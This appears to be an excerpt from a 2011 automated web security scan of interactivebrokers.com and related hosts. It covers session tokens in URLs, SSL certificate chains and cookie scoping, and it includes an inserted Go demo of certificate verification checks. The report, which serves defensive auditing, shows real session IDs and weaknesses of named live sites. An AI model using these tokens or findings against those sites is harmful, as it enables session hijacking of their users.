User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:49:02 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C60781F9AA7215C818780FF42B0C3387.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=867E3A2969A1B7AC4B17AEA673304A9C.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=46BC11DD415F2D363F6025F219DE210D.www3; Path=/Universal; Secure
Content-Language: en
Content-Length: 16504
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...

7.5. https://www.interactivebrokers.com/cstools/ib_app_help/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /cstools/ib_app_help/

Issue detail

The URL in the request carries a session token: the jsessionid path parameter (servlet URL rewriting, so the token travels in the request line rather than in a cookie):

Request

GET /cstools/ib_app_help/;jsessionid=54D71E83ABB03FD58EA41BA2BB7B8355.www3?UserName=&AccountNo=&taxId=&lang=en&source=APP&context=&priority=&location=PRE_REG:1000&custType= HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 08 Sep 2011 19:49:04 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 35821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Interact
...[SNIP]...

8. SSL certificate
There are 23 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
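The three checks the paragraph above lists (trusted issuer, hostname match, validity at the current date) can be exercised offline. The Go program below is an added example, not part of the scanner's report or of any site's code: it mints a throwaway root CA and a wildcard leaf whose subject and validity window copy the *.interactivebrokers.com certificate recorded in 8.1 below, then runs crypto/x509 verification for a host the wildcard covers, the bare apex, an unrelated host, a client that does not trust the root, and a date after expiry. The CA name, all keys, and the scenario hosts other than the one in 8.1 are constructed for the demo.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// mint signs tmpl with signer under parent and parses the result back.
func mint(tmpl, parent *x509.Certificate, pub interface{}, signer *ecdsa.PrivateKey) (*x509.Certificate, error) {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// buildPKI mints a throwaway root CA and a leaf for *.interactivebrokers.com (the subject
// the scanner recorded). Everything is generated in memory; none of it is the real DigiCert chain.
func buildPKI(notBefore, notAfter time.Time) (root, leaf *x509.Certificate, err error) {
	rootKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	leafKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	rootTmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "Demo Root CA"},
		NotBefore:             notBefore,
		NotAfter:              notBefore.AddDate(20, 0, 0), // outlives every leaf in the demo
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign,
	}
	if root, err = mint(rootTmpl, rootTmpl, &rootKey.PublicKey, rootKey); err != nil {
		return nil, nil, err
	}
	leaf, err = mint(&x509.Certificate{
		SerialNumber: big.NewInt(2),
		Subject:      pkix.Name{CommonName: "*.interactivebrokers.com"},
		DNSNames:     []string{"*.interactivebrokers.com"}, // clients match the SAN, not the CN
		NotBefore:    notBefore,
		NotAfter:     notAfter,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}, root, &leafKey.PublicKey, rootKey)
	return root, leaf, err
}

// check runs the three checks (chain to a trusted root, name match for host,
// validity at now) and names the first failure Go's verifier reports.
func check(leaf *x509.Certificate, roots *x509.CertPool, host string, now time.Time) string {
	_, err := leaf.Verify(x509.VerifyOptions{Roots: roots, DNSName: host, CurrentTime: now})
	var invalid x509.CertificateInvalidError
	switch {
	case err == nil:
		return "ok"
	case errors.As(err, new(x509.HostnameError)):
		return "hostname mismatch"
	case errors.As(err, new(x509.UnknownAuthorityError)):
		return "issuer not trusted"
	case errors.As(err, &invalid) && invalid.Reason == x509.Expired:
		return "outside validity period"
	}
	return "other: " + err.Error()
}

// runScenarios uses the validity window the scanner recorded for the
// *.interactivebrokers.com certificate and returns scenario name -> outcome.
func runScenarios() (map[string]string, error) {
	root, leaf, err := buildPKI(time.Date(2010, 5, 25, 0, 0, 0, 0, time.UTC), time.Date(2013, 7, 30, 23, 59, 59, 0, time.UTC))
	if err != nil {
		return nil, err
	}
	trusted := x509.NewCertPool()
	trusted.AddCert(root)
	untrusted := x509.NewCertPool() // a client whose trust store lacks the demo root
	scanTime := time.Date(2011, 9, 8, 19, 14, 33, 0, time.UTC)
	const host = "cwt1.interactivebrokers.com"
	return map[string]string{
		"wildcard covers cwt1":         check(leaf, trusted, host, scanTime),
		"wildcard does not cover apex": check(leaf, trusted, "interactivebrokers.com", scanTime),
		"unrelated host":               check(leaf, trusted, "www.barchart.com", scanTime),
		"root not in trust store":      check(leaf, untrusted, host, scanTime),
		"checked after notAfter":       check(leaf, trusted, host, time.Date(2014, 1, 1, 0, 0, 0, 0, time.UTC)),
	}, nil
}

func main() {
	fmt.Println(runScenarios()) // fmt prints map keys in sorted order, then the (nil) error
}
```

Two details worth noticing: a wildcard in the SAN covers exactly one label, so *.interactivebrokers.com does not cover the apex name, and Go reports the validity-period failure before it even tries to build a chain, so an expired certificate fails the same way whether or not the issuer is trusted.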



8.1. https://cwt1.interactivebrokers.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://cwt1.interactivebrokers.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.interactivebrokers.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon May 24 18:00:00 GMT-06:00 2010
Valid to:  Tue Jul 30 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

Certificate chain #4

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

8.2. https://www.barchart.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.barchart.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.barchart.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Tue Dec 15 18:00:00 GMT-06:00 2009
Valid to:  Mon Feb 10 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 02:09:10 GMT-06:00 2005
Valid to:  Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #2

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 18:00:00 GMT-06:00 2006
Valid to:  Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #3

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 12:10:42 GMT-06:00 1999
Valid to:  Tue Jul 09 12:19:22 GMT-06:00 2019

8.3. https://www.cqgtrader.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.cqgtrader.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  www.cqgtrader.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Fri Mar 25 18:00:00 GMT-06:00 2011
Valid to:  Sun Mar 25 17:59:59 GMT-06:00 2012

8.4. https://www.efutures.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.efutures.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  www.efutures.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Fri Jun 24 18:00:00 GMT-06:00 2011
Valid to:  Sat Jul 21 17:59:59 GMT-06:00 2012

8.5. https://www.interactivebrokers.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.interactivebrokers.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.interactivebrokers.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon May 24 18:00:00 GMT-06:00 2010
Valid to:  Tue Jul 30 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

Certificate chain #4

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

8.6. https://account.optionsxpress.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.com
Issued by:  Thawte SSL CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Mon Sep 03 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  thawte Primary Root CA
Valid from:  Thu Nov 16 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

Certificate chain #3

Issued to:  thawte Primary Root CA
Issued by:  thawte Primary Root CA
Valid from:  Thu Nov 16 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

8.7. https://adwords.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  adwords.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:49 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:49 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.8. https://docs.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.9. https://icewebinar.webex.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://icewebinar.webex.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.webex.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Tue Jun 21 18:00:00 GMT-06:00 2011
Valid to:  Thu Jun 21 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.10. https://interactivebrokers.webex.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.webex.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Tue Jun 21 18:00:00 GMT-06:00 2011
Valid to:  Thu Jun 21 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.11. https://mail.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mail.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:  Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 18:00:00 GMT-06:00 2004
Valid to:  Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.12. https://online.optionsxpress.ca/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.optionsxpress.ca
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.ca
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed Nov 24 14:20:38 GMT-06:00 2010
Valid to:  Tue Nov 26 15:45:36 GMT-06:00 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.13. https://online.optionsxpress.com.sg/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.optionsxpress.com.sg
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.com.sg
Issued by:  RapidSSL CA
Valid from:  Thu Jan 27 08:18:31 GMT-06:00 2011
Valid to:  Tue Jan 29 08:29:11 GMT-06:00 2013

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 GMT-06:00 2010
Valid to:  Tue Feb 18 16:45:05 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

Certificate chain #3

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

8.14. https://online.optionsxpress.eu/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.optionsxpress.eu
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.eu
Issued by:  RapidSSL CA
Valid from:  Wed Feb 23 04:17:40 GMT-06:00 2011
Valid to:  Tue Feb 25 05:17:40 GMT-06:00 2014

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 GMT-06:00 2010
Valid to:  Tue Feb 18 16:45:05 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

Certificate chain #3

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

8.15. https://onlineint.optionsxpress.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineint.optionsxpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.com
Issued by:  Thawte SSL CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Mon Sep 03 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 GMT-06:00 2006
Valid to:  Wed Dec 30 17:59:59 GMT-06:00 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 18:00:00 GMT-06:00 1996
Valid to:  Fri Jan 01 17:59:59 GMT-06:00 2021

8.16. https://seal.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  seal.verisign.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jul 06 18:00:00 GMT-06:00 2010
Valid to:  Sun Jul 06 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

8.17. https://server.iad.liveperson.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://server.iad.liveperson.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  SERVER.IAD.LIVEPERSON.NET
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Jan 27 18:00:00 GMT-06:00 2010
Valid to:  Sat Jan 28 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

8.18. https://sites.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sites.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.19. https://www.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:  Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 18:00:00 GMT-06:00 2004
Valid to:  Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.20. https://www.optionsxpress.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.optionsxpress.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Jan 24 18:00:00 GMT-06:00 2010
Valid to:  Mon Feb 06 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.21. https://www.optionsxpress.com.au/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com.au
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.optionsxpress.com.au,ST=Illinois
Issued by:  Akamai Subordinate CA 3
Valid from:  Sat May 07 01:31:44 GMT-06:00 2011
Valid to:  Mon May 07 01:31:44 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

8.22. https://www.pfgboss.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pfgboss.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.pfgboss.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Mon Apr 11 15:58:51 GMT-06:00 2011
Valid to:  Thu Apr 11 14:20:17 GMT-06:00 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:  Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:  Sat Jun 29 11:06:20 GMT-06:00 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:  Tue Jun 25 18:19:54 GMT-06:00 2019

8.23. https://www.secureclient5.ranweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.secureclient5.ranweb.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.secureclient5.ranweb.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu May 12 18:00:00 GMT-06:00 2011
Valid to:  Mon May 14 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9. Cookie scoped to parent domain
There are 113 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
